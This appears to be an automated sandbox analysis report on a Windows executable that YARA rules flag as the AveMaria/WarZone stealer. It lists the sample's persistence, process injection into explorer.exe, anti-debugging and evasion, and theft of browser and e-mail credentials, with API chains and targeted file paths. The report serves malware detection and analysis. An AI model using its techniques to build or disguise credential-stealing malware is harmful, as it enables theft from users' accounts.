Source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2_RID2C2E date = 2016-01-30 09:38:11, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Classification labelShow sources
Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@4/2@0/1
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025D609 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_0025D609
Source: C:\ProgramData\images.exeCode function: 3_2_0043D609 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0043D609
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025EC17 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0025EC17
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_002606D5 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,0_2_002606D5
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025F843 GetModuleFileNameW,IsUserAnAdmin,FindResourceW,LoadResource,SizeofResource,LockResource,0_2_0025F843
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025B81D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0025B81D
Creates files inside the program directoryShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: 4ifN8B061M.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policiesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: 4ifN8B061M.exeVirustotal: Detection: 47%
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeFile read: C:\Users\user\Desktop\4ifN8B061M.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\4ifN8B061M.exe 'C:\Users\user\Desktop\4ifN8B061M.exe'
Source: unknownProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: unknownProcess created: C:\ProgramData\images.exe 'C:\ProgramData\images.exe'
Source: C:\Users\user\Desktop\4ifN8B061M.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
Creates a directory in C:\Program FilesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
PE / OLE file has a valid certificateShow sources
Source: 4ifN8B061M.exeStatic PE information: certificate valid
PE file contains a mix of data directories often seen in goodwareShow sources
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: 4ifN8B061M.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: 4ifN8B061M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains a valid data directory to section mappingShow sources
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 4ifN8B061M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025582B LoadLibraryA,GetProcAddress,ExitProcess,0_2_0025582B
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E1AA6 push ecx; ret 0_2_012E1AB9
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00251130 push eax; ret 0_2_00251144
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00251130 push eax; ret 0_2_0025116C
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0024311B push ebx; iretd 0_2_0024311C
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_002419C0 push ebp; retf 0_2_00241A63
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00230A6F push eax; ret 0_2_00230A83
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00230A6F push eax; ret 0_2_00230AAB
Source: C:\ProgramData\images.exeCode function: 3_2_00CC1AA6 push ecx; ret 3_2_00CC1AB9
Source: C:\ProgramData\images.exeCode function: 3_2_00431130 push eax; ret 3_2_00431144
Source: C:\ProgramData\images.exeCode function: 3_2_00431130 push eax; ret 3_2_0043116C
Source: C:\ProgramData\images.exeCode function: 3_2_0042311B push ebx; iretd 3_2_0042311C
Source: C:\ProgramData\images.exeCode function: 3_2_004219C0 push ebp; retf 3_2_00421A63
Source: C:\ProgramData\images.exeCode function: 3_2_00410A6F push eax; ret 3_2_00410A83
Source: C:\ProgramData\images.exeCode function: 3_2_00410A6F push eax; ret 3_2_00410AAB

Persistence and Installation Behavior:

barindex
Contains functionality to create new usersShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025B799 NetUserAdd,NetLocalGroupAddMembers,0_2_0025B799
Contains functionality to download and launch executablesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00252675 URLDownloadToFileW,ShellExecuteW,0_2_00252675
Drops PE filesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeFile created: C:\ProgramData\images.exeJump to dropped file
Drops PE files to the application program directory (C:\ProgramData)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeFile created: C:\ProgramData\images.exeJump to dropped file
Contains functionality to read ini properties file for application configurationShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_002598B0 lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,0_2_002598B0
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025936E GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,0_2_0025936E
Source: C:\ProgramData\images.exeCode function: 3_2_004398B0 lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,3_2_004398B0
Source: C:\ProgramData\images.exeCode function: 3_2_0043936E GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,3_2_0043936E

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025B889 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0025B889
Creates an autostart registry keyShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ImagesJump to behavior
Source: C:\Users\user\Desktop\4ifN8B061M.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ImagesJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to hide user accountsShow sources
Source: 4ifN8B061M.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: 4ifN8B061M.exe, 00000000.00000002.424063177.00230000.00000040.00000001.sdmpString found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A66
Source: images.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 00000003.00000003.566547321.0012A000.00000004.00000001.sdmpString found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A66
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeFile opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | deleteJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\4ifN8B061M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\4ifN8B061M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate running servicesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,0_2_0025BDDC
Source: C:\ProgramData\images.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,3_2_0043BDDC
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeThread delayed: delay time: 1000000Jump to behavior
Source: C:\Users\user\Desktop\4ifN8B061M.exeThread delayed: delay time: 1000000Jump to behavior
Source: C:\ProgramData\images.exeThread delayed: delay time: 1000000Jump to behavior
Source: C:\ProgramData\images.exeThread delayed: delay time: 1000000Jump to behavior
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-27633
Source: C:\ProgramData\images.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-27511
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exe TID: 3432Thread sleep time: -4000000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\4ifN8B061M.exe TID: 3560Thread sleep count: 56 > 30Jump to behavior
Source: C:\Users\user\Desktop\4ifN8B061M.exe TID: 3432Thread sleep time: -1000000s >= -30000sJump to behavior
Source: C:\ProgramData\images.exe TID: 3568Thread sleep count: 41 > 30Jump to behavior
Source: C:\ProgramData\images.exe TID: 3568Thread sleep time: -41000000s >= -30000sJump to behavior
Source: C:\ProgramData\images.exe TID: 3324Thread sleep count: 51 > 30Jump to behavior
Source: C:\ProgramData\images.exe TID: 3568Thread sleep time: -1000000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\ProgramData\images.exeLast function: Thread delayed
Source: C:\ProgramData\images.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E879D FindFirstFileExA,0_2_012E879D
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00258A9C GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,0_2_00258A9C
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025DEC5 FindFirstFileW,FindNextFileW,0_2_0025DEC5
Source: C:\ProgramData\images.exeCode function: 3_2_00CC879D FindFirstFileExA,3_2_00CC879D
Source: C:\ProgramData\images.exeCode function: 3_2_0043DEC5 FindFirstFileW,FindNextFileW,3_2_0043DEC5
Source: C:\ProgramData\images.exeCode function: 3_2_00438A9C GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,3_2_00438A9C
Contains functionality to query local drivesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025DFC9 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,0_2_0025DFC9
Program exit pointsShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeAPI call chain: ExitProcess graph end nodegraph_0-27859
Source: C:\ProgramData\images.exeAPI call chain: ExitProcess graph end nodegraph_3-27672

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E1817 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_012E1817
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025582B LoadLibraryA,GetProcAddress,ExitProcess,0_2_0025582B
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E943A mov eax, dword ptr fs:[00000030h]0_2_012E943A
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E528C mov eax, dword ptr fs:[00000030h]0_2_012E528C
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025E8EC mov eax, dword ptr fs:[00000030h]0_2_0025E8EC
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025E5B7 mov eax, dword ptr fs:[00000030h]0_2_0025E5B7
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025E5BE mov eax, dword ptr fs:[00000030h]0_2_0025E5BE
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00230467 mov eax, dword ptr fs:[00000030h]0_2_00230467
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_002454A9 mov eax, dword ptr fs:[00000030h]0_2_002454A9
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0023E22B mov eax, dword ptr fs:[00000030h]0_2_0023E22B
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0023DEF6 mov eax, dword ptr fs:[00000030h]0_2_0023DEF6
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0023DEFD mov eax, dword ptr fs:[00000030h]0_2_0023DEFD
Source: C:\ProgramData\images.exeCode function: 3_2_00CC943A mov eax, dword ptr fs:[00000030h]3_2_00CC943A
Source: C:\ProgramData\images.exeCode function: 3_2_00CC528C mov eax, dword ptr fs:[00000030h]3_2_00CC528C
Source: C:\ProgramData\images.exeCode function: 3_2_0043E8EC mov eax, dword ptr fs:[00000030h]3_2_0043E8EC
Source: C:\ProgramData\images.exeCode function: 3_2_0043E5B7 mov eax, dword ptr fs:[00000030h]3_2_0043E5B7
Source: C:\ProgramData\images.exeCode function: 3_2_0043E5BE mov eax, dword ptr fs:[00000030h]3_2_0043E5BE
Source: C:\ProgramData\images.exeCode function: 3_2_00410467 mov eax, dword ptr fs:[00000030h]3_2_00410467
Source: C:\ProgramData\images.exeCode function: 3_2_004254A9 mov eax, dword ptr fs:[00000030h]3_2_004254A9
Source: C:\ProgramData\images.exeCode function: 3_2_0041E22B mov eax, dword ptr fs:[00000030h]3_2_0041E22B
Source: C:\ProgramData\images.exeCode function: 3_2_0041DEF6 mov eax, dword ptr fs:[00000030h]3_2_0041DEF6
Source: C:\ProgramData\images.exeCode function: 3_2_0041DEFD mov eax, dword ptr fs:[00000030h]3_2_0041DEFD
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E9EC7 GetProcessHeap,0_2_012E9EC7
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E19AA SetUnhandledExceptionFilter,0_2_012E19AA
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E1817 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_012E1817
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E1C6F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_012E1C6F
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E5F98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_012E5F98
Source: C:\ProgramData\images.exeCode function: 3_2_00CC19AA SetUnhandledExceptionFilter,3_2_00CC19AA
Source: C:\ProgramData\images.exeCode function: 3_2_00CC1C6F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00CC1C6F
Source: C:\ProgramData\images.exeCode function: 3_2_00CC1817 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00CC1817
Source: C:\ProgramData\images.exeCode function: 3_2_00CC5F98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00CC5F98

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to inject threads in other processesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025FD9E OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,0_2_0025FD9E
Source: C:\ProgramData\images.exeCode function: 3_2_0043FD9E OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,3_2_0043FD9E
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe0_2_0025FE7E
Source: C:\ProgramData\images.exeCode function: CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe3_2_0043FE7E
Contains functionality to add an ACL to a security descriptorShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025F6C1 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,0_2_0025F6C1
Contains functionality to create a new security descriptorShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025D508 AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,0_2_0025D508
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: images.exe, 00000003.00000002.579104628.00DA0000.00000002.00000001.sdmp, images.exe, 00000004.00000002.579883636.00DA0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: images.exe, 00000003.00000002.579104628.00DA0000.00000002.00000001.sdmp, images.exe, 00000004.00000002.579883636.00DA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: images.exe, 00000003.00000002.579104628.00DA0000.00000002.00000001.sdmp, images.exe, 00000004.00000002.579883636.00DA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E1ABB cpuid 0_2_012E1ABB
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E1706 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,RtlQueryPerformanceCounter,0_2_012E1706

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Increases the number of concurrent connection per server for Internet ExplorerShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AveMaria stealerShow sources
Source: Yara matchFile source: 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.567782220.0012C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: images.exe PID: 3596, type: MEMORY
Source: Yara matchFile source: Process Memory Space: 4ifN8B061M.exe PID: 3380, type: MEMORY
Source: Yara matchFile source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE
Contains functionality to steal Chrome passwords or cookiesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: \Google\Chrome\User Data\Default\Login Data0_2_0025AFDF
Source: C:\ProgramData\images.exeCode function: \Google\Chrome\User Data\Default\Login Data3_2_0043AFDF
Contains functionality to steal e-mail passwordsShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: POP3 Password0_2_00258F40
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: SMTP Password0_2_00258F40
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: IMAP Password0_2_00258F40
Source: C:\ProgramData\images.exeCode function: POP3 Password3_2_00438F40
Source: C:\ProgramData\images.exeCode function: SMTP Password3_2_00438F40
Source: C:\ProgramData\images.exeCode function: IMAP Password3_2_00438F40

Remote Access Functionality:

barindex
Yara detected AveMaria stealerShow sources
Source: Yara matchFile source: 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.567782220.0012C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: images.exe PID: 3596, type: MEMORY
Source: Yara matchFile source: Process Memory Space: 4ifN8B061M.exe PID: 3380, type: MEMORY
Source: Yara matchFile source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE

Malware Configuration

No configs have been found

Signature Similarity

Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

TimeTypeDescription
09:32:42API Interceptor23x Sleep call for process: 4ifN8B061M.exe modified
09:32:47AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Images C:\ProgramData\images.exe
09:33:42API Interceptor58x Sleep call for process: images.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
4ifN8B061M.exe48%VirustotalBrowse
4ifN8B061M.exe100%AviraTR/Crypt.Agent.yyhho
4ifN8B061M.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\images.exe100%AviraTR/Crypt.Agent.yyhho
C:\ProgramData\images.exe100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
3.2.images.exe.430000.1.unpack100%AviraTR/RedCap.ghjptDownload File
0.2.4ifN8B061M.exe.250000.1.unpack100%AviraTR/RedCap.ghjptDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
